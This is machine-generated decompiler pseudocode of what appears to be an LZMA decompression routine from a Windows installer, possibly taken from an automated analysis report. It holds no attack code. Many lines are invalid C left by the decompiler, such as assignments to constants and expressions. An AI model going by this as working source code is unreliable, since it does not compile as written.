                                                                                                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                      								goto L139;
                                                                                                                      							}
                                                                                                                      							L137:
                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                                                      								L170:
                                                                                                                      								_t568 = 0x22;
                                                                                                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                      								_t535 = 0;
                                                                                                                      								L172:
                                                                                                                      								return _t535;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      							L139:
                                                                                                                      							_t533 =  *(_t613 - 0x84);
                                                                                                                      							while(1) {
                                                                                                                      								 *(_t613 - 0x88) = _t533;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t534 =  *(_t613 - 0x88);
                                                                                                                      									if(_t534 > 0x1c) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                                                                      										case 0:
                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      											_t534 =  *( *(_t613 - 0x70));
                                                                                                                      											if(_t534 > 0xe1) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                                                      											_push(0x2d);
                                                                                                                      											asm("cdq");
                                                                                                                      											_pop(_t570);
                                                                                                                      											_push(9);
                                                                                                                      											_pop(_t571);
                                                                                                                      											_t609 = _t538 / _t570;
                                                                                                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                      											asm("cdq");
                                                                                                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                      											 *(_t613 - 0x3c) = _t604;
                                                                                                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                      												L10:
                                                                                                                      												if(_t612 == 0) {
                                                                                                                      													L12:
                                                                                                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      													goto L15;
                                                                                                                      												} else {
                                                                                                                      													goto L11;
                                                                                                                      												}
                                                                                                                      												do {
                                                                                                                      													L11:
                                                                                                                      													_t612 = _t612 - 1;
                                                                                                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                      												} while (_t612 != 0);
                                                                                                                      												goto L12;
                                                                                                                      											}
                                                                                                                      											if( *(_t613 - 4) != 0) {
                                                                                                                      												GlobalFree( *(_t613 - 4));
                                                                                                                      											}
                                                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      											 *(_t613 - 4) = _t534;
                                                                                                                      											if(_t534 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                      												goto L10;
                                                                                                                      											}
                                                                                                                      										case 1:
                                                                                                                      											L13:
                                                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                      												 *(_t613 - 0x88) = 1;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      											_t45 = _t613 - 0x48;
                                                                                                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                      											__eflags =  *_t45;
                                                                                                                      											L15:
                                                                                                                      											if( *(_t613 - 0x48) < 4) {
                                                                                                                      												goto L13;
                                                                                                                      											}
                                                                                                                      											_t546 =  *(_t613 - 0x40);
                                                                                                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                      												L20:
                                                                                                                      												 *(_t613 - 0x48) = 5;
                                                                                                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                      												goto L23;
                                                                                                                      											}
                                                                                                                      											 *(_t613 - 0x74) = _t546;
                                                                                                                      											if( *(_t613 - 8) != 0) {
                                                                                                                      												GlobalFree( *(_t613 - 8));
                                                                                                                      											}
                                                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                      											 *(_t613 - 8) = _t534;
                                                                                                                      											if(_t534 == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											} else {
                                                                                                                      												goto L20;
                                                                                                                      											}
                                                                                                                      										case 2:
                                                                                                                      											L24:
                                                                                                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                      											 *(_t613 - 0x84) = 6;
                                                                                                                      											 *(_t613 - 0x4c) = _t553;
                                                                                                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                      											 *(_t613 - 0x54) = _t606;
                                                                                                                      											goto L133;
                                                                                                                      										case 3:
                                                                                                                      											L21:
                                                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                      												 *(_t613 - 0x88) = 3;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      											_t67 = _t613 - 0x70;
                                                                                                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      											__eflags =  *_t67;
                                                                                                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      											L23:
                                                                                                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                      											if( *(_t613 - 0x48) != 0) {
                                                                                                                      												goto L21;
                                                                                                                      											}
                                                                                                                      											goto L24;
                                                                                                                      										case 4:
                                                                                                                      											L133:
                                                                                                                      											_t531 =  *_t606;
                                                                                                                      											_t589 = _t531 & 0x0000ffff;
                                                                                                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                      											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                      												 *(_t613 - 0x40) = 1;
                                                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                                                      												 *_t606 = _t532;
                                                                                                                      											} else {
                                                                                                                      												 *(_t613 - 0x10) = _t565;
                                                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                      											}
                                                                                                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                      												goto L139;
                                                                                                                      											}
                                                                                                                      										case 5:
                                                                                                                      											goto L137;
                                                                                                                      										case 6:
                                                                                                                      											__edx = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      												while(1) {
                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                      											__cl = 8;
                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      													__eflags =  *_t98;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												goto L61;
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      													__eflags = __eax;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                      												__ebx = 0;
                                                                                                                      												__ebx = 1;
                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      												goto L41;
                                                                                                                      											}
                                                                                                                      										case 7:
                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												goto L69;
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      											while(1) {
                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                      												goto L133;
                                                                                                                      											}
                                                                                                                      										case 8:
                                                                                                                      											goto L0;
                                                                                                                      										case 9:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												goto L89;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                      												goto L171;
                                                                                                                      											}
                                                                                                                      											__eax = 0;
                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      											__eflags = _t258;
                                                                                                                      											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                      											goto L75;
                                                                                                                      										case 0xa:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      												while(1) {
                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                      											goto L88;
                                                                                                                      										case 0xb:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      											} else {
                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      											L88:
                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      											L89:
                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      											goto L69;
                                                                                                                      										case 0xc:
                                                                                                                      											L99:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t334 = __ebp - 0x70;
                                                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t334;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                      											goto L101;
                                                                                                                      										case 0xd:
                                                                                                                      											L37:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t122;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											L39:
                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      												goto L48;
                                                                                                                      											}
                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                      												goto L54;
                                                                                                                      											}
                                                                                                                      											L41:
                                                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                                                      											__eax = __eax + 1;
                                                                                                                      											__eax = __eax << 8;
                                                                                                                      											__eax = __eax + __ebx;
                                                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      											__ax =  *__esi;
                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												__cx = __ax;
                                                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                                                      												__cx = __ax >> 5;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                                                      												 *__esi = __ax;
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                      												0x800 = 0x800 - __edx;
                                                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                      												 *__esi = __cx;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      												goto L39;
                                                                                                                      											} else {
                                                                                                                      												goto L37;
                                                                                                                      											}
                                                                                                                      										case 0xe:
                                                                                                                      											L46:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t156 = __ebp - 0x70;
                                                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t156;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											while(1) {
                                                                                                                      												L48:
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													break;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__ebx = __edx + 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      													goto L46;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											L54:
                                                                                                                      											_t173 = __ebp - 0x34;
                                                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      											__eflags =  *_t173;
                                                                                                                      											goto L55;
                                                                                                                      										case 0xf:
                                                                                                                      											L58:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t203 = __ebp - 0x70;
                                                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t203;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											L60:
                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                      												L55:
                                                                                                                      												__al =  *(__ebp - 0x44);
                                                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      												goto L56;
                                                                                                                      											}
                                                                                                                      											L61:
                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                      											__edx = __ebx + __ebx;
                                                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                                                      											__esi = __edx + __eax;
                                                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      											__ax =  *__esi;
                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												__cx = __ax;
                                                                                                                      												__ebx = __edx + 1;
                                                                                                                      												__cx = __ax >> 5;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												 *__esi = __ax;
                                                                                                                      											} else {
                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                      												 *__esi = __cx;
                                                                                                                      											}
                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      												goto L60;
                                                                                                                      											} else {
                                                                                                                      												goto L58;
                                                                                                                      											}
                                                                                                                      										case 0x10:
                                                                                                                      											L109:
                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t365 = __ebp - 0x70;
                                                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                      											__eflags =  *_t365;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											goto L111;
                                                                                                                      										case 0x11:
                                                                                                                      											L69:
                                                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                                                      											while(1) {
                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                      												goto L133;
                                                                                                                      											}
                                                                                                                      										case 0x12:
                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                      												while(1) {
                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                      													goto L133;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      											__eflags = __eax;
